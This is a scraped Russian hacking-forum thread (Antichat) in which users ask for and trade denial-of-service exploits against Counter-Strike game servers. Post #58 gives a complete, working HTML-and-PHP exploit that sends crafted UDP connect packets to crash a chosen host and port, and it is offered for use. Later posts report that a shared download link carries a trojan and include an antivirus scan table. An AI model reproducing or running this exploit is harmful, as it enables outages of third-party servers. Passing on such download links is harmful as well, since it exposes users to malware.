ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #51  
Старый 04.12.2007, 19:15
Аватар для gold-goblin
gold-goblin
Познавший АНТИЧАТ
Регистрация: 26.03.2007
Сообщений: 1,095
Провел на форуме:
5265510

Репутация: 455


По умолчанию

Вроде он
 
Ответить с цитированием

  #52  
Старый 06.12.2007, 12:25
Аватар для Lomaka
Lomaka
Новичок
Регистрация: 19.04.2007
Сообщений: 1
Провел на форуме:
83125

Репутация: 0
По умолчанию

На сколько я понимаю, сплойты и экзешник валят Nosteam сервера, а для Steam есть какой-нить сплойт или экзешник?
 
Ответить с цитированием

  #53  
Старый 06.12.2007, 20:54
Аватар для Don1=2
Don1=2
Участник форума
Регистрация: 10.09.2007
Сообщений: 131
Провел на форуме:
829460

Репутация: 170
По умолчанию

/me пацталом.... нет. есть тока .txt сплоит... его надо вставлять вместо имени и коннактицо
 
Ответить с цитированием

  #54  
Старый 06.12.2007, 21:00
Аватар для inlanger
inlanger
Познавший АНТИЧАТ
Регистрация: 07.01.2007
Сообщений: 1,263
Провел на форуме:
3326855

Репутация: 702


По умолчанию

перевыложите куда-нить...а то все ссылки битые.
 
Ответить с цитированием

  #55  
Старый 16.12.2007, 12:43
Аватар для kLAZE
kLAZE
Новичок
Регистрация: 13.12.2007
Сообщений: 2
Провел на форуме:
51278

Репутация: 2
По умолчанию

Цитата:
Сообщение от SHaDoW[RF]  
а как узнать пасс?
Никак. Ибо спроси у админа =))
 
Ответить с цитированием

  #56  
Старый 16.12.2007, 17:47
Аватар для Tw!m4
Tw!m4
Познающий
Регистрация: 15.06.2007
Сообщений: 91
Провел на форуме:
261355

Репутация: 38
По умолчанию

а есть ещё актуальные сплойты под кс?
 
Ответить с цитированием

  #57  
Старый 10.02.2008, 00:06
Аватар для .Striker
.Striker
Участник форума
Регистрация: 11.11.2007
Сообщений: 260
Провел на форуме:
2808062

Репутация: 155
По умолчанию

и те старые еще актуальны, но не на всех сервах

большое спасибо ребята за работу!!
 
Ответить с цитированием

  #58  
Старый 10.02.2008, 02:59
Аватар для DCRM
DCRM
Познающий
Регистрация: 12.12.2006
Сообщений: 89
Провел на форуме:
500895

Репутация: 60
Отправить сообщение для DCRM с помощью ICQ
Thumbs up

Цитата:
Сообщение от inlanger  
перевыложите куда-нить...а то все ссылки битые.

Попробуй тут скачать:
>>DownLoad<<

Ещё нашёл сплоит...
1я часть:
Код:
<html>
<head>
<title>PHP Counter Strike DOS Poc</title>

<style type="text/css">

input {
width: 150px;
}

td {
font-size: 12px;
font-family: Verdana, "Trebuchet MS";
text-align: left;
}

span.err {
color: red;
}

span.ok {
color: green;
}

</style>

</head>

<body onload="checkpass()">

<div style="width: 210px; margin: auto;">
<form name="csform" method="post" action="cs.php">

<table border="1" align="center" cellpadding="2" cellspacing="0" style="width: 100%;">
<tr>
<td style="width: 50px;">Host</td>
<td colspan="2"><input name="host" type="text" value=""/></td>
</tr>

<tr>
<td>Port</td>
<td colspan="2"><input name="port" type="text" value=""/></td>
</tr>

<tr>
<td>&nbsp;</td>
<td><input name="auth" type="checkbox" value="" style="width: 30px;"/></td>
<td>Auth Type 2</td>
</tr>

<tr>
<td>Pass</td>
<td colspan="2"><input name="pass" type="text" value="" /></td>
</tr>


<tr>
<td>&nbsp;</td>
<td colspan="2"><input type="submit" Value="Run"/></td>
</tr>


</table>
<br/>
</form>
</div>
<center>Written by gemaglabin.Bug was found by .FUF.Thx 2 Sax-mmS<br>
</body>
</html>
2я часть
PHP код:
<?php

/*
CS-dos exploit made by gemaglabin
Bug was discovered by .FUF # 111596
Big respect 2 Sax-mmS ( for html ) , Focs ( for his cs server biggrin.gif ) , SkvoznoY , Bug(O)R,Antichat.ru and Cup.su
underwater.cup.su
*/

ini_set("display_errors","0");

function 
HELLO_PACKET()
{
$packet pack("H*","FFFFFFFF");
$packet .= "TSource Engine Query";
$packet .= pack("H*","00");
return 
$packet;
}

function 
CHALLENGE_PACKET()
{
$packet pack("H*","FFFFFFFF");
$packet .= "getchallenge valve";
$packet .= pack("H*","00");
return 
$packet;
}

function 
LOGIN_PACKET_4()
{
global 
$cookie;
global 
$password;
$packet pack("H*","FFFFFFFF");
$packet .= "connect 47 ";
$packet .= $cookie.' "';
$packet .= '\prot\4\unique\-1\raw\valve\cdkey\d506d189cf551620a70277a3d2c55bb2" "';
$packet .= '\_cl_autowepswitch\1\bottomcolor\6\cl_dlmax\128\cl_lc\1\cl_lw\1\cl_updaterate\30\mod';
$packet .= 'el\gordon\name\Born to be pig (..)\topcolor\30\_vgui_menus\1\_ah\1\rate\3500\*fid\0\pass';
$packet .= 'word\\'.$password;
$packet .= pack("H*","220A0000EE02");
return 
$packet;
}

function 
LOGIN_PACKET_2()
{
global 
$cookie;
global 
$password;
$packet pack("H*","FFFFFFFF");
$packet .= "connect 47 ";
$packet .= $cookie.' "';
$packet .= '\prot\2\raw\d506d189cf551620a70277a3d2c55bb2" "\_cl_autowepswitch\1\bott';
$packet .= 'omcolor\6\cl_dlmax\128\cl_lc\1\cl_lw\1\cl_updaterate\30\model\gordon\nam';
$packet .= 'e\Born to be pig (..)\topcolor\30\_vgui_menus\1\_ah\1\rate\3500\*fid\0\pass';
$packet .= 'word\\'.$password;
$packet .= pack("H*","22");
return 
$packet;
}

function 
dowork($host,$port,$password,$auth)
{
global 
$password;
global 
$cookie;
# connecting to target host
$fsock fsockopen("udp://".$host,(int) $port,$errnum,$errstr,2);
if (!
$fsock) die ($errstr);
else
{
# sending hello packet
fwrite ($fsock,HELLO_PACKET());
fread ($fsock,100);
# sending chalennge packet
fwrite ($fsock,CHALLENGE_PACKET());
# recieving cookies
$resp fread($fsock,100);
# grab cookies from packet
$cookie substr($resp,strpos($resp,"A00000000")+10);
$cookie substr($cookie,0,strpos($cookie," "));
# sending login packet
if (!$authfwrite $fsock,LOGIN_PACKET_4());else fwrite $fsock,LOGIN_PACKET_2());
$resp fread($fsock,100);
}
}

IF (isset(
$_POST['host']) && isset($_POST['port']))
{
IF (empty(
$_POST['pass'])) $password "123";
else 
$password $_POST['pass'];
$fserver $_POST['host'];
$fport $_POST['port'];
if (isset(
$_POST['auth'])) $fauth true;else $fauth=false;
# we have to connect 2 times
$result dowork($fserver,$fport,$password,$fauth);
$result dowork($fserver,$fport,$password,$fauth);
# parsing result
echo "Exploit Sent";
}
?>

Последний раз редактировалось DCRM; 10.02.2008 в 03:32..
 
Ответить с цитированием

  #59  
Старый 10.02.2008, 20:41
Аватар для Витян
Витян
Участник форума
Регистрация: 25.12.2006
Сообщений: 220
Провел на форуме:
2544458

Репутация: 243
По умолчанию

по твоей ссылке троян
 
Ответить с цитированием

  #60  
Старый 11.02.2008, 03:00
Аватар для DCRM
DCRM
Познающий
Регистрация: 12.12.2006
Сообщений: 89
Провел на форуме:
500895

Репутация: 60
Отправить сообщение для DCRM с помощью ICQ
По умолчанию

Цитата:
Сообщение от Витян  
по твоей ссылке троян
Хм... я всего лишь выцепил её из Гугля, НОД, Каспер и DrWeb молчали... хотя что ты хочешь ожидать от такой проги то)
Код:
Антивирус 	Версия 	Обновление 	Результат
AhnLab-V3 	2008.2.4.10 	2008.02.04 	-
AntiVir 	7.6.0.62 	2008.02.04 	TR/Agent.act.2
Authentium 	4.93.8 	2008.02.04 	-
Avast 	4.7.1098.0 	2008.02.03 	Win32:Agent-PJA
AVG 	7.5.0.516 	2008.02.04 	Generic6.WSG
BitDefender 	7.2 	2008.02.04 	Trojan.Generic.15882
CAT-QuickHeal 	9.00 	2008.02.04 	-
ClamAV 	0.92 	2008.02.04 	-
DrWeb 	4.44.0.09170 	2008.02.04 	-
eSafe 	7.0.15.0 	2008.01.28 	suspicious Trojan/Worm
eTrust-Vet 	31.3.5509 	2008.02.04 	-
Ewido 	4.0 	2008.02.04 	-
FileAdvisor 	1 	2008.02.04 	High threat detected
Fortinet 	3.14.0.0 	2008.02.04 	Grayware
F-Prot 	4.4.2.54 	2008.02.03 	-
F-Secure 	6.70.13260.0 	2008.02.04 	-
Ikarus 	T3.1.1.20 	2008.02.04 	Trojan.Win32.Agent.act
Kaspersky 	7.0.0.125 	2008.02.04 	-
McAfee 	5222 	2008.02.04 	-
Microsoft 	1.3204 	2008.02.04 	-
NOD32v2 	2847 	2008.02.04 	-
Norman 	5.80.02 	2008.02.04 	-
Panda 	9.0.0.4 	2008.02.04 	Trj/Downloader.MDW
Prevx1 	V2 	2008.02.04 	Generic.Malware
Rising 	20.29.22.00 	2008.01.30 	-
Sophos 	4.26.0 	2008.02.04 	Mal/Generic-A
Sunbelt 	2.2.907.0 	2008.02.02 	-
Symantec 	10 	2008.02.04 	Trojan Horse
TheHacker 	6.2.9.208 	2008.02.04 	-
VBA32 	3.12.6.0 	2008.02.03 	Trojan.Win32.Agent.act
VirusBuster 	4.3.26:9 	2008.02.04 	-
Webwasher-Gateway 	6.6.2 	2008.02.04 	Trojan.Agent.act.2
p.s. А скрин то я с этого exe делал... ну да ладно)

Последний раз редактировалось DCRM; 11.02.2008 в 18:02..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Opera 9 DOS exploit bul.666 Soft - Windows 7 16.10.2007 23:05
exploit phpBB 2.0.19 ( by SpiderZ ) liauliau Форумы 21 13.01.2007 23:01



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ